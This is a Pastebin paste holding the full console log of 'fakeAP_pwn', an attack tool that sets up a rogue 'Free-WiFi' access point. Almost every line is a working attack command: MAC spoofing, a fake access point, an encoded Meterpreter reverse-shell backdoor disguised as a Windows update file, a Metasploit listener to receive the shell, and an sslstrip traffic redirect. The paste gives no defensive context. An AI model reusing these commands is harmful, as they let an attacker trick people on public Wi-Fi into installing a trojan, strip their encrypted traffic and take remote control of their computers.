Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [01;36m[*][00m g0tmilk's fakeAP_pwn v0.3-RC10
- [01;32m[>][00m Checking environment...
- [01;33m[i][00m ESSID=Free-WiFi
- [01;33m[i][00m fakeAPchannel=6
- [01;33m[i][00m interface=wlan0
- [01;33m[i][00m wifiInterface=wlan1
- [01;33m[i][00m monitorInterface=mon0
- [01;33m[i][00m payload=sdb
- [01;33m[i][00m backdoorPath=/root/backdoor.exe
- [01;33m[i][00m metasploitPath=/pentest/exploits/framework3
- [01;33m[i][00m htdocs_folder=/var/www/fakeAP_pwn
- [01;33m[i][00m mtu=1800
- [01;33m[i][00m transparent=true
- [01;33m[i][00m respond2All=false
- [01;33m[i][00m fakeAPmac=true
- [01;33m[i][00m extras=false
- [01;33m[i][00m debug=false
- [01;33m[i][00m verbose=2
- [01;33m[i][00m gatewayIP=192.168.1.254
- [01;33m[i][00m ourIP=192.168.1.67
- [01;33m[i][00m port=21185
- [01;32m[>][00m Stopping services and programs...
- [i] Command: killall dhcpd3 apache2 airbase-ng wicd-client
- [i] Command: /etc/init.d/dhcp3-server stop
- [i] Command: /etc/init.d/apache2 stop
- [01;32m[>][00m Setting up wireless card...
- [i] Command: airmon-ng stop mon0
- [i] Command: ifconfig wlan1 down
- [i] Command: ifconfig wlan1 up
- [i] Command: airmon-ng start wlan1
- [01;32m[>][00m Changing MAC Address...
- [i] Command: ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
- [01;33m[i][00m macAddress=24:43:b4:22:ec:a4 (unknown)
- [01;32m[>][00m Creating scripts...
- [i] Created: /tmp/fakeAP_pwn.rb
- [i] Created: /etc/apache2/sites-available/fakeAP_pwn
- [01;32m[>][00m Creating exploit...(Windows)
- [i] Command: /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /pentest/exploits/framework3/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
- [01;32m[>][00m Creating our fake access point...
- [i] Command: airbase-ng -c 6 -e "Free-WiFi" mon0 -v
- [01;32m[>][00m Setting up our end...
- [i] Command: chmod 775 /var/run/
- [i] Command: touch /var/lib/dhcp3/dhcpd.leases
- [01;32m[>][00m Starting Metasploit...
- [i] Command: /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/tmp/fakeAP_pwn.rb E
- [01;32m[>][00m Starting SSLStrip...
- [i] Command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- [i] Command: sslstrip -k -f -l 10000
- [01;32m[>][00m Starting DHCP server...
- [i] Command: dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
- [01;32m[>][00m Starting Web server...
- [i] Command: /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && /etc/init.d/apache2 reload
- [01;32m[>][00m Forcing target to vist our site...
- [01;33m[*][00m Waiting for target to connect...
- [01;32m[>][00m Cleaning up...
- [i] Command: ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && /etc/init.d/apache2 reload
- [01;36m[>][00m Done! (= Have you... g0tmi1k?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement